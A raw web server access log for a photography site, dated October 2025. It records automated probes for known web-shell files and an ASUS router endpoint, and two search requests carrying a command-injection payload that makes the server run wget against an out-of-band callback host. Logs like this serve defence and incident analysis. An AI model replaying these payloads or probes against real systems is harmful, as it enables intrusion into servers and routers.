157.20.32.210 - - [18/Oct/2025:09:36:57 -0400] "GET /search.php?search=%22;wget+http%3A%2F%2Fd3pm34ikdbcl3g7iqchgoc7ogqfati77a.oast.pro%27;%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:36:12 -0400] "GET /wp-includes/random_compat/about.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:09:36:20 -0400] "GET /products106838784?kg=0105535953 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:09:36:23 -0400] "GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1" 200 0 "https://salhab360photos.com" "asusrouter--"
185.11.167.13 - - [18/Oct/2025:09:36:25 -0400] "GET /alfa-rex.php7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:36:38 -0400] "GET /wp-content/themes/mero-megazines/ws.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.68.166.157 - - [18/Oct/2025:09:36:44 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
185.11.167.13 - - [18/Oct/2025:09:36:40 -0400] "GET /xl2023.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:35:58 -0400] "GET /wp-sts.php HTTP/1.1" 503 854 "http://salhab360photos.com/wp-sts.php" "Go-http-client/2.0"
157.20.32.210 - guest [18/Oct/2025:09:36:59 -0400] "POST /tools.cgi HTTP/1.1" 200 0 "https://salhab360photos.com/tools.cgi" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15"
185.11.167.13 - - [18/Oct/2025:09:37:05 -0400] "GET /wp-admin/xl2023.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:37:08 -0400] "GET /search.php?search=%22;wget+http%3A%2F%2Fd3pm34ikdbcl3g7iqchgoc7ogqfati77a.oast.pro%27;%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:37:09 -0400] "GET /backend/backend/auth/restore HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
